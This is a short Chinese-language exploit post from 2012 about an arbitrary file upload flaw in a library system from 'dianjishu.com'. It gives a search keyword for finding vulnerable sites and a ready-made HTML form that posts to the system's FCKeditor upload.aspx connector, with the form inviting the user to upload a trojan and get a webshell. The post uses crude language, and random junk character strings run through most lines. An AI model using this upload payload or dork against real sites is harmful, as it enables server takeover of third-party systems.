主题:图书馆系统任意文件上传漏洞
% l7 F; D: T1 x5 O" k0 j: O2 S M 作者:冰锋刺客
8 ~" E6 P7 m, L7 I: v 厂商:点击书(dianjishu.com)7 y- u0 m+ ?" Y6 V4 N9 p- h' ]
日期:2012-6-21
* O ?' N( z( p7 l5 A
$ g3 @- X w# E7 ?3 k9 }- J: ?I 概述1 K0 n. W& Y6 V7 {
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell8 m- g# r+ Z! |
II 简介
2 ^0 h# c# A: L) a4 l# }, A 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved": n6 T$ X9 T+ z h+ O) ~
补充一个漏洞$ n( ~. k2 i/ s7 ~! [% @
<form id="frmUpload" enctype="multipart/form-data"
5 {0 [5 c- `6 q' b7 G: v( D action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>0 F# B; y4 m, t d# k7 H2 B1 m
<input id="btnUpload" type="submit" value="操翻他">
, q1 @! e1 U) H- k) J9 X: @ </form>0 U; s+ W8 n% J* w! V+ u
你们懂的/ ^' v, p4 G+ t0 \+ G- I
那傻逼提供还需要改包.' |" e4 |' @: e8 G
自己看了下源代码发现fckeditor6 M/ Q. w4 g/ i4 ^; O. L' V$ H
直接秒杀
2 K: a4 E" \1 O3 O |